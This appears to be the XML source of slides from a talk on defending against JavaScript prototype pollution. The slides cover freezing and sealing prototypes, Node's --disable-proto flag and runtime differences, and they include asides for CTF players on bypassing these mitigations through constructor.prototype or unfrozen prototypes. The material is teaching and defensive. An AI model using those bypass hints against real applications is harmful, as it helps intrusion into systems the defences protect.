            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B1AE29B-ECE5-EA35-F51C-130A9F423A58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>The advantage is that all objects with said prototype are protected automatically without code changes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="859900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="657B83"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="268BD2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>seal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t> is sufficient to block most prototype pollution as most prototype pollution requires adding new properties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="859900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="657B83"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="268BD2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>freeze</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t> blocks the rest of them</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>The disadvantage is that code that changes prototypes no longer work, which may occur for older libraries that do monkey patching [1]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Another one is that you might forget to freeze some prototypes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Slightly relevant for CTF players, you might find some unfrozen prototypes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF06E451-6F90-CBF4-7799-E76399710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
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A16E7982-366D-077B-8EFA-695058890522}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4928007"/>
            <a:ext cx="7209402" cy="21544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https://developer.mozilla.org/docs/Web/JavaScript/Inheritance_and_the_prototype_chain#implicit_constructors_of_literals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="800" dirty="0"/>
              <a:t>, see the warning section</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="800" dirty="0">
              <a:hlinkClick r:id="rId2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3078593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3BE4-C0A7-A273-6F88-1C44AE147481}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Remove </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__proto__</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B1AE29B-ECE5-EA35-F51C-130A9F423A58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Remember the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__proto__ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>property is not in the ECMAScript standard (accurately, optional)?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Node.js has a CLI flag </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>disable-proto=delete</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> (there are other values such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>throw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>) to remove the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__proto__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> property [1]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$ node --disable-proto=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00979D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>delete</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Welcome to Node.js v22</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8A7B52"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.0.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</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Type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>".help"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00979D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> more information.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt; ({}).__proto__</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br>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D35400"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.prototype.__proto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D35400"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>undefined</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Newer JavaScript runtimes, such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0" err="1"/>
              <a:t>Deno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> [2] (but not Bun), simply does not have the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__proto__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> property</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>A defense in depth technique, meaning it </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" strike="sngStrike" dirty="0"/>
              <a:t>tortures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> makes it harder for attackers to exploit [1]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>constructor.prototype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t> is still available, but is usually harder to exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>For CTF players, check the Node.js launch arguments; and check whether they are using the Node.js runtime in the first place</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF06E451-6F90-CBF4-7799-E76399710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
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A16E7982-366D-077B-8EFA-695058890522}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4804946"/>
            <a:ext cx="7209402" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="800" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://cheatsheetseries.owasp.org/cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html#nodejs-configuration-flag</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="800" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Object/proto#browser_compatibility</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10619932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03BE4-C0A7-A273-6F88-1C44AE147481}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Remove </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__proto__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> 2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B1AE29B-ECE5-EA35-F51C-130A9F423A58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>The advantage is it slows down attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>The disadvantage is that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>constructor.prototype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> is still available, so other complementing mitigation techniques are still needed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>It might also break older existing code (e.g. libraries) that access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__proto__</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>For CTF players, this either means you either go through </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>constructor.prototype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> instead or prototype pollution is not the right solution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF06E451-6F90-CBF4-7799-E763997107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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17929320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3418-EAAC-EE50-3BEC-6AF92F662214}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Mitigations/obstacles</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A01B89C9-59B7-66E2-9B08-6CCC2BB1A377}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>There are only a few ways to defense, so it is best for you to memorize all of them</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Best used against </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="2400" dirty="0"/>
              <a:t>unethical hacking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="2400" dirty="0" err="1"/>
              <a:t>blobcats</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>For CTF designers: Have fun!</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{342F7599-CB88-1116-17E0-7D7E5E41F8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3380977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453E-A5AD-BFA4-8FD4-C4E09905DEB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Data type demonstration</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{776B9A2D-F572-8F18-98E0-86DE8741D0B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1321199"/>
            <a:ext cx="9144000" cy="3822252"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pP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Welcome to Node.js v22</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="900" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8A7B52"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>.0.0</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Type </a:t>
